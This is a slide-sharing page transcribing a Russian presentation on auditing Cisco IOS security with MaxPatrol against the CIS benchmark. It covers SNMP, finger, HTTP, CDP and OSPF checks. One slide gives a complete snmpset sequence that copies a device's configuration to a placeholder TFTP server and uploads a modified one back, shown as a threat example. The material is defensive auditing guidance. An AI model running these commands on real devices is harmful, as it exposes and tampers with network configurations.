1 / 34

Сканирование Cisco IOS в MaxPatrol

Сканирование Cisco IOS в MaxPatrol. Сафронов Илья. What’s the deal?. Безопасность сетевых устройств ( Cisco IOS ) Стандарты безопасности Контроль за соответствием стандартам безопасности. Cisco security hardening. Комплексный подход к безопасности устройств Cisco.

Download Presentation

Сканирование Cisco IOS в MaxPatrol

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Сканирование Cisco IOS в MaxPatrol Сафронов Илья

  2. What’s the deal? • Безопасность сетевых устройств (Cisco IOS) • Стандарты безопасности • Контроль за соответствием стандартам безопасности

  3. Cisco security hardening • Комплексный подход к безопасности устройств Cisco. • Management Plane (управляющий IOS’ом трафик (SSH, SNMP)) • Control Plane (трафик управления сетью(BGP, STP)) • Data Plane ( проходящие сквозь устройство данные)

  4. Security benchmarking -CIS Рекомендации и стандарты по безопасности оборудования и ПО.

  5. CIS – Cisco IOS • Бенчмаркпо безопасности для Cisco IOS

  6. CIS – Cisco IOS Группы проверок: • AAA • SNMP • Global services (CDP, DHCP, HTTP) • Logging • Neighbor authentication (EIGRP, OSPF, RIP)

  7. Как проверить? • Max Patrol

  8. Чего бояться?

  9. Проверка SNMP

  10. Настройки на устройстве

  11. Угроза – Snmpwalk enumeration

  12. Угроза - Копирование файла конфигурации через SNMP snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <адрес TFTP-сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1 ///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройство snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <адрес TFTP-сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 //Перезагрузка устройства для применения изменений TFTP-сервер

  13. Решение?

  14. Проверка finger

  15. Настройки на устройстве

  16. Угроза – login enumeration

  17. Решение?

  18. Проверка HTTP

  19. Настройки на устройстве

  20. Угроза – кража учетных данных

  21. Решение ?

  22. Проверка CDP

  23. Настройки на устройстве

  24. Угроза - Enumeration через CDP

  25. Решение ?

  26. Аутентификация OSPF

  27. Настройки на устройстве

  28. Угроза – «Отравление» таблиц маршрутизации

  29. Решение?

  30. Кастомный стандарт • Не нравится / не подходит стандарт? • Собери свой!

  31. Заключение • Защищайте свои сетевые устройства • Следите за стандартами безопасности • Регулярно проводите аудит сети

  32. Сафронов Илья isafronov@ptsecurity.ru

More Related